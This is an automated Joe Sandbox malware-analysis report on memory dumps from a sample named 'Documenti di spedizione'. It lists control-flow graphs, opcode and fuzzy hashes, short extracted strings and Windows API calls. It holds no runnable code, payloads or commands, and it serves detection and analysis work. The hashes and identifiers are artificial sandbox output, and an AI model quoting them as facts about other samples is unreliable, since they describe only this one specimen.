                                            • Opcode ID: ec869627c2aeacd45e0f73c7c0403a7921758377d1dda7d0aa16033a1fba32e2
                                            • Instruction ID: 2e9105daa6462e55359f16a6cfb540be3cbb526bc54f16106818d7c4b94b09c6
                                            • Opcode Fuzzy Hash: ec869627c2aeacd45e0f73c7c0403a7921758377d1dda7d0aa16033a1fba32e2
                                            • Instruction Fuzzy Hash: 44715C34E0030A8BDB58DFA9D490A9EB7B6FF85304F608639D409EB354EB75D9478B81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1717 38cf920c-38cf9235 1719 38cf9237-38cf923a 1717->1719 1720 38cf923c-38cf925b 1719->1720 1721 38cf9260-38cf9263 1719->1721 1720->1721 1722 38cf9269-38cf927e 1721->1722 1723 38cf9b23-38cf9b25 1721->1723 1730 38cf9296-38cf92ac 1722->1730 1731 38cf9280-38cf9286 1722->1731 1724 38cf9b2c-38cf9b2f 1723->1724 1725 38cf9b27 1723->1725 1724->1719 1727 38cf9b35-38cf9b3f 1724->1727 1725->1724 1735 38cf92b7-38cf92b9 1730->1735 1732 38cf928a-38cf928c 1731->1732 1733 38cf9288 1731->1733 1732->1730 1733->1730 1736 38cf92bb-38cf92c1 1735->1736 1737 38cf92d1-38cf9342 1735->1737 1738 38cf92c5-38cf92c7 1736->1738 1739 38cf92c3 1736->1739 1748 38cf936e-38cf938a 1737->1748 1749 38cf9344-38cf9367 1737->1749 1738->1737 1739->1737 1754 38cf938c-38cf93af 1748->1754 1755 38cf93b6-38cf93d1 1748->1755 1749->1748 1754->1755 1760 38cf93fc-38cf9417 1755->1760 1761 38cf93d3-38cf93f5 1755->1761 1766 38cf9419-38cf943b 1760->1766 1767 38cf9442-38cf944c 1760->1767 1761->1760 1766->1767 1768 38cf944e-38cf9457 1767->1768 1769 38cf945c-38cf94d6 1767->1769 1768->1727 1775 38cf94d8-38cf94f6 1769->1775 1776 38cf9523-38cf9538 1769->1776 1780 38cf94f8-38cf9507 1775->1780 1781 38cf9512-38cf9521 1775->1781 1776->1723 1780->1781 1781->1775 1781->1776
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: a2616179692c4e1abb879225b178bf75b2af5c8479e94edae9af581abfaaa7dc
                                            • Instruction ID: 97e8c49ddf45840a6fa48a0ffd0af367ca971161cff135a42e885f7b91f23082
                                            • Opcode Fuzzy Hash: a2616179692c4e1abb879225b178bf75b2af5c8479e94edae9af581abfaaa7dc
                                            • Instruction Fuzzy Hash: 7A513E70B002069FEB55DB78D850B6EB3F6EF88744F10856AC509EB395EA319C478B91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1784 38cf4c60-38cf4c8c 1785 38cf4c8e-38cf4c91 1784->1785 1786 38cf4c93-38cf4cad 1785->1786 1787 38cf4cb2-38cf4cb5 1785->1787 1786->1787 1788 38cf4cbb-38cf4db3 1787->1788 1789 38cf5394-38cf5396 1787->1789 1807 38cf4db9-38cf4e06 call 38cf551c 1788->1807 1808 38cf4e36-38cf4e3d 1788->1808 1791 38cf539d-38cf53a0 1789->1791 1792 38cf5398 1789->1792 1791->1785 1793 38cf53a6-38cf53b3 1791->1793 1792->1791 1821 38cf4e0c-38cf4e28 1807->1821 1809 38cf4e43-38cf4eb3 1808->1809 1810 38cf4ec1-38cf4eca 1808->1810 1827 38cf4ebe 1809->1827 1828 38cf4eb5 1809->1828 1810->1793 1824 38cf4e2a 1821->1824 1825 38cf4e33 1821->1825 1824->1825 1825->1808 1827->1810 1828->1827
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$XPbq
                                            • API String ID: 0-2292610095
                                            • Opcode ID: 6311d154435037ae2d79d2e199df9d4862c3e01e0d20228b488b93cd02345c78
                                            • Instruction ID: b0f8e8895d4647253abdd18a9384307e2a3156e3f885aed216a4d355fbb2fb08
                                            • Opcode Fuzzy Hash: 6311d154435037ae2d79d2e199df9d4862c3e01e0d20228b488b93cd02345c78
                                            • Instruction Fuzzy Hash: 40515D70E002089FEB549FB5C855BAEBAF6AF88700F208529E105AB395DA758D468F91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1830 da101-da128 1832 da12a-da12d 1830->1832 1833 da12f-da14b 1832->1833 1834 da150-da153 1832->1834 1833->1834 1835 da18c-da18e 1834->1835 1836 da155-da187 1834->1836 1838 da195-da198 1835->1838 1839 da190 1835->1839 1836->1835 1838->1832 1840 da19a-da1a9 1838->1840 1839->1838 1843 da1ab-da1b2 1840->1843 1844 da1ea-da1ff 1840->1844 1845 da1d9-da1e8 1843->1845 1846 da1b4-da1ba 1843->1846 1850 da200 1844->1850 1845->1843 1845->1844 1851 da1c0 call da53e 1846->1851 1852 da1c0 call da214 1846->1852 1853 da1c0 call da340 1846->1853 1848 da1c6-da1d1 1848->1845 1850->1850 1851->1848 1852->1848 1853->1848
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 5$8
                                            • API String ID: 0-67872593
                                            • Opcode ID: bb5e513ac971d0d2d690b165c22daa4ac20a389d081638b37b1c56ea6e1cd36b
                                            • Instruction ID: 6ac55c76d9e08e6d7e1f0a9fd13f08428b589d20bf5468ef6b579254b19d0dc6
                                            • Opcode Fuzzy Hash: bb5e513ac971d0d2d690b165c22daa4ac20a389d081638b37b1c56ea6e1cd36b
                                            • Instruction Fuzzy Hash: 30319335E0020A9BCB15CF65D85069EF7B2FF86300F14C62AE815BB340DB749C86CB91
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38CED902
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3268996018.0000000038CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38ce0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 7a29d1c2245a3ebddbfbf488c220b7fb8dc13af1f9fa2bdf06f727ec5d9ed950
                                            • Instruction ID: 44fb7b505251a44a147fb58c67ef38fa12ad1a70d39ad54be52d7c71ffa07d08
                                            • Opcode Fuzzy Hash: 7a29d1c2245a3ebddbfbf488c220b7fb8dc13af1f9fa2bdf06f727ec5d9ed950
                                            • Instruction Fuzzy Hash: 0951B1B5D00349DFDB14CFA9C994ADEBBB5FF48310F20812AE819AB210D775A885CF91
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38CED902
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3268996018.0000000038CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38ce0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 2abe91f82278612d1263ac92a2d4081280b898f0b0255946e15a07bab4999f44
                                            • Instruction ID: 20b4d194f1be96e481855d4ce42e32ac0b139f964f7d5c2ff1f9a8955550b666
                                            • Opcode Fuzzy Hash: 2abe91f82278612d1263ac92a2d4081280b898f0b0255946e15a07bab4999f44
                                            • Instruction Fuzzy Hash: 7F41CFB5D00349DFDB14CFAAC894ADEBBB5BF48310F20812AE918AB210D775A845CF91
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 39200101
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269230698.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_39200000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 9b42d2aed6f2521ae58587b1ab71272b37b79d532ad7cc662d51fa96ffb1b671
                                            • Instruction ID: 5cefe1caab4fe7f84dedefd7e8cc3b86de0680d37f3697c5939941bc919727e8
                                            • Opcode Fuzzy Hash: 9b42d2aed6f2521ae58587b1ab71272b37b79d532ad7cc662d51fa96ffb1b671
                                            • Instruction Fuzzy Hash: 544115B8A007098FDB04CF99C848A9AFBF5FB89314F248459D518AB321D375A841CFA0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38CE34DF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3268996018.0000000038CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38ce0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c5a5169d59821130363a95aedba5c6bf3928a5be4be472cdb6442beadb336104
                                            • Instruction ID: 657ac945059010cf960d4b6b2ed1735bf20271817f5072ecbc87ce0cab6005a0
                                            • Opcode Fuzzy Hash: c5a5169d59821130363a95aedba5c6bf3928a5be4be472cdb6442beadb336104
                                            • Instruction Fuzzy Hash: 2221F2B59002489FDB10CFAAD984ADEBFF8EB49310F14805AE918A7210D378A940CFA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38CE34DF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3268996018.0000000038CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38ce0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: b27962ee665d275b51af9a97e556390886efbeeed80841acfbed19e4570e541d
                                            • Instruction ID: 28a5e8a8aa589394388edcac502b067b002d5a9014b2e9bc2f4dcbfa1543664f
                                            • Opcode Fuzzy Hash: b27962ee665d275b51af9a97e556390886efbeeed80841acfbed19e4570e541d
                                            • Instruction Fuzzy Hash: 8821E2B59002089FDB10CFAAD984ADEFFF9FB48310F14801AE918A3310D378A940CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 392025CD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269230698.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_39200000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 943125126bcfbb7e8a60c2e6c835ab56f3275f80eae7542c59c4f05da8e2d277
                                            • Instruction ID: f9b223ca3e649ef90660bbc1c1b14ed6b42dd9b96ed59b98006e93b2f1d8d9c3
                                            • Opcode Fuzzy Hash: 943125126bcfbb7e8a60c2e6c835ab56f3275f80eae7542c59c4f05da8e2d277
                                            • Instruction Fuzzy Hash: 3711F2B59006498FCB20DFAAD944B9EBFF8EB49320F20845AD518A7250D379A944CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 392025CD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269230698.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_39200000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 2a0dbd614558c5a5d12336d1df4b3cb9fe9f15bdd307425d7389c3cc49f9fa16
                                            • Instruction ID: 2e5f0d413d293a9f4e667a6000ccae025d0843d2f62728af9d5a38163760a90d
                                            • Opcode Fuzzy Hash: 2a0dbd614558c5a5d12336d1df4b3cb9fe9f15bdd307425d7389c3cc49f9fa16
                                            • Instruction Fuzzy Hash: 141103B5D047488FCB20DF9AD548B9EBFF4EB49310F20845AD519A7310D378A940CFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 5288100b015cf30250111b58f3c05788ac21077fb5a8d0cc67c6bbf6d35c6e2c
                                            • Instruction ID: 2651e927e2c28d33a6d0ddf07a205fdf5e1ba6ef6181c103b223702d17c05a81
                                            • Opcode Fuzzy Hash: 5288100b015cf30250111b58f3c05788ac21077fb5a8d0cc67c6bbf6d35c6e2c
                                            • Instruction Fuzzy Hash: E371DF31B002069FDB559F68E8506BEB7E2EF88350F24843AD506EB385DB35DD46CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: be0b52e14a7fcad3b16752f60e1d75b316e8acaa5cf4a38898680899e792b76f
                                            • Instruction ID: db7acd8e272933487e0b379825fb1eae9cd50caa0f2b093cd9476f2cdbe0f0ba
                                            • Opcode Fuzzy Hash: be0b52e14a7fcad3b16752f60e1d75b316e8acaa5cf4a38898680899e792b76f
                                            • Instruction Fuzzy Hash: 8D317070E143199BDB24CBA5C8507AEBBB2FF95304F60446AE406EB340E7749C42CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: ac611d762805e5e6bc43f706489b078f2a106f5cff17789b5ad3e10e4c65f8a6
                                            • Instruction ID: 4ce1d517f686698ef64a0a89dc58660cc4fcd782045627363015ef2df5af39d7
                                            • Opcode Fuzzy Hash: ac611d762805e5e6bc43f706489b078f2a106f5cff17789b5ad3e10e4c65f8a6
                                            • Instruction Fuzzy Hash: 9A41CF70A0034ADFEB44DF65C86469EBBB6FF85380F208539D505EB240EB769947CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: cf679ae4f4cb8f7a271ec45c95c75b37e2d0672e2998e27797dd882c36933ef8
                                            • Instruction ID: b935e0da0113f9d32c68a182ccec4e682fb32ab88e043796f247c668755686fb
                                            • Opcode Fuzzy Hash: cf679ae4f4cb8f7a271ec45c95c75b37e2d0672e2998e27797dd882c36933ef8
                                            • Instruction Fuzzy Hash: 0931E230B002069FDB189F34A5106AE77E6EF85710F208539D506DB359DE35DD02CBA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH]q
                                            • API String ID: 0-3168235125
                                            • Opcode ID: 24ceb69f4c4d234ab4e76f1ea8adfe33de2aeaaee3c6ebd119ca692b69587a6a
                                            • Instruction ID: 13ce40e11ae04eefccdfdd31edc1e5f4af8738574a596ae1dda94de37ad1802d
                                            • Opcode Fuzzy Hash: 24ceb69f4c4d234ab4e76f1ea8adfe33de2aeaaee3c6ebd119ca692b69587a6a
                                            • Instruction Fuzzy Hash: FD31FE307002018FEB48AB74D5646AF3AE7AF89650F208538D006EB395DE3ADD06CBA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 5409065b28c0767a785ce3192a709183202de01be8ee3eb8bfa23c53187a06bc
                                            • Instruction ID: 7b624d888fd742eb4ca44903a9770e87036869e4e8502ec4d76cf676a23dc245
                                            • Opcode Fuzzy Hash: 5409065b28c0767a785ce3192a709183202de01be8ee3eb8bfa23c53187a06bc
                                            • Instruction Fuzzy Hash: 7E317070E143199BDF24CBA5C8447AEBBB2FF95314F20846AE50AEB340E7749C42CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 5
                                            • API String ID: 0-2226203566
                                            • Opcode ID: fa0750ef486012602d9ebe6c8bf026aa03d36c149fc5aa508045bbe3c33e84a4
                                            • Instruction ID: 2d015375ab79764c896e33c68f4f2e07b164844121072c00a2298740d76db311
                                            • Opcode Fuzzy Hash: fa0750ef486012602d9ebe6c8bf026aa03d36c149fc5aa508045bbe3c33e84a4
                                            • Instruction Fuzzy Hash: B041EFB09003499FDB10CFA9C584ADEBFF5FF48310F24802AE809AB254DB75A945CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 5
                                            • API String ID: 0-2226203566
                                            • Opcode ID: 60707af0bceeec9288b6b8f4ced6c7b87626cac3695bc74b1c0529e4e0334473
                                            • Instruction ID: 5966f7362fdeeac91f3603b01498947f199efabb1f3b410885680556269a1974
                                            • Opcode Fuzzy Hash: 60707af0bceeec9288b6b8f4ced6c7b87626cac3695bc74b1c0529e4e0334473
                                            • Instruction Fuzzy Hash: B5215A30A01344AFDB54EB68C5247EE77F6AF49345F1004AAD506AB3A1DF358D41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |
                                            • API String ID: 0-2343686810
                                            • Opcode ID: 2bdaf7ccc03c35bf4449579cdc67d2c5142c9d97b562097f1349a792144111fa
                                            • Instruction ID: eaf69e230b9862e74401cd9d34877855337640f4251dc1b31a7fe74a8f10b529
                                            • Opcode Fuzzy Hash: 2bdaf7ccc03c35bf4449579cdc67d2c5142c9d97b562097f1349a792144111fa
                                            • Instruction Fuzzy Hash: 76115E74B002549FDB54AF78C804BADBBF1AF88700F14846AE50AEB3A0DB799D018B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8
                                            • API String ID: 0-4194326291
                                            • Opcode ID: f8e966d0ef2a3fae75a63b3d952f4b28ce4b4ab2d659ab6d16fbfe39f5ff36a0
                                            • Instruction ID: 763432b1a055bcc10fdcc537c960aa4780fdaecabd55c27cb8fd74ddf5cf46e8
                                            • Opcode Fuzzy Hash: f8e966d0ef2a3fae75a63b3d952f4b28ce4b4ab2d659ab6d16fbfe39f5ff36a0
                                            • Instruction Fuzzy Hash: ED115932F147C10BC3066B7598100A6BBE69FD6210B1986FBD909C7292EE70DC89C391
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |
                                            • API String ID: 0-2343686810
                                            • Opcode ID: 895ca9ca6396580480f3cb093655caeb1eb255355ee6754ba435194e0684988f
                                            • Instruction ID: f1b680ca044be367264b5aa2788e74357cca2c1591490208be3b554748cea6b4
                                            • Opcode Fuzzy Hash: 895ca9ca6396580480f3cb093655caeb1eb255355ee6754ba435194e0684988f
                                            • Instruction Fuzzy Hash: F8116D70F002149FDB54EF78C808BAEB7F5AF48700F14846AE50AEB3A0DB359D018B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q
                                            • API String ID: 0-3081347316
                                            • Opcode ID: 7574fd0ac0ea5d7fd5ee599919a28626c947b887bd07a23a1b8ddda31d3df37f
                                            • Instruction ID: d7bc851d4179a899708936a61081863f5141469de85c29241f02533ea3f3818c
                                            • Opcode Fuzzy Hash: 7574fd0ac0ea5d7fd5ee599919a28626c947b887bd07a23a1b8ddda31d3df37f
                                            • Instruction Fuzzy Hash: 0511C8317082445FC716AF7994246EE3BF1DF86704F1048AFD049CB396DE369945CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q
                                            • API String ID: 0-1007455737
                                            • Opcode ID: ecaaabea29841c03aabc794e49c726f053b24a5551e70a7d02019b9a786491e1
                                            • Instruction ID: 6dfc44f3eb9ebb29168844704b2220363c332b4ce7984df4fe874b7668081a18
                                            • Opcode Fuzzy Hash: ecaaabea29841c03aabc794e49c726f053b24a5551e70a7d02019b9a786491e1
                                            • Instruction Fuzzy Hash: 78F0AF75700201CBFF988E59EAA06AD7BA5FF44354F504036D904D7361CB36D92BCB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8
                                            • API String ID: 0-4194326291
                                            • Opcode ID: 3e64d4a97f72f690a2b4e33351055ed571c901744d1645aaa5f5c76b3a9d8549
                                            • Instruction ID: ec25eac9c4d2b5e722169f85aaecc3ee30bea34e071a8fa90079615766ad9fc7
                                            • Opcode Fuzzy Hash: 3e64d4a97f72f690a2b4e33351055ed571c901744d1645aaa5f5c76b3a9d8549
                                            • Instruction Fuzzy Hash: C5D02B3050D7E06FD3766658D0443957FDC5F42744F1980EAF44646181DE545C89C390
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c1f80114940ff1ddfdfa7dbefc3f06da88e69171802579b6e4acc37221570e4
                                            • Instruction ID: 861e9d3067656d020fcc07782a35f9af88fdef771cc2c7614ecd43bfd02543ee
                                            • Opcode Fuzzy Hash: 7c1f80114940ff1ddfdfa7dbefc3f06da88e69171802579b6e4acc37221570e4
                                            • Instruction Fuzzy Hash: EF229E30700205ABCB19AB28E89166873A7EFC5359B24893EE045DB365CF79EC47DB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6a047192391157708be29e8041f515c1ca92e906b25b60d1b605685573b0e8f
                                            • Instruction ID: 2c62d878d73d4e3f193ff5f195aed87b441b83368f9dc93f5b88b27979b5464b
                                            • Opcode Fuzzy Hash: f6a047192391157708be29e8041f515c1ca92e906b25b60d1b605685573b0e8f
                                            • Instruction Fuzzy Hash: 7B128E30700205AFCB19AB28E85166873A7EFC5359B24893EE045DB365CF79EC47DB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1635cfe4768fe8bd220a179a1e20209874d5f97151f22083a17c1bc54d496cd
                                            • Instruction ID: 78b078472fcc9d8d10d824f272bcf3550bd0d06d1b5c9a748b9da178c32fe2a0
                                            • Opcode Fuzzy Hash: a1635cfe4768fe8bd220a179a1e20209874d5f97151f22083a17c1bc54d496cd
                                            • Instruction Fuzzy Hash: 7D128E30700205ABCB19AB28E85166C73A7EFC5359B24893EE045DB365CF79DC47DB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f440b095954f15a85de725b1d4bdd421d5fd8c63b576be92ec723b2b810bdd94
                                            • Instruction ID: 9f3dd396073aeb03bb318de4b2a3f88aad7424c17a6f167cfa505695168ddcf0
                                            • Opcode Fuzzy Hash: f440b095954f15a85de725b1d4bdd421d5fd8c63b576be92ec723b2b810bdd94
                                            • Instruction Fuzzy Hash: B0B19F34F002059BEB54DFA4D99069EB7B6AF84754F208438E906EB346DB35ED47CB80
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc3779d217262e4c3442a3f315fa91704ed13c24062124b6c4afff2b93e00135
                                            • Instruction ID: 51ada0fd7ccde0980e2941de95f1d9624afb457e49e2e24e8929390733e25045
                                            • Opcode Fuzzy Hash: bc3779d217262e4c3442a3f315fa91704ed13c24062124b6c4afff2b93e00135
                                            • Instruction Fuzzy Hash: B8A17274B00209CFFB54CB69D59079D7BB6EB89350F604835E409EB396CB3ADC868B52
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98aa8459b4a1d87f612d675c0de87cf90b5c1b63d6cbe07108ccb6653c3f83ed
                                            • Instruction ID: b751c76fbda860835839fdb1ae55959ebec5fb0692452f98351fc0f626b23020
                                            • Opcode Fuzzy Hash: 98aa8459b4a1d87f612d675c0de87cf90b5c1b63d6cbe07108ccb6653c3f83ed
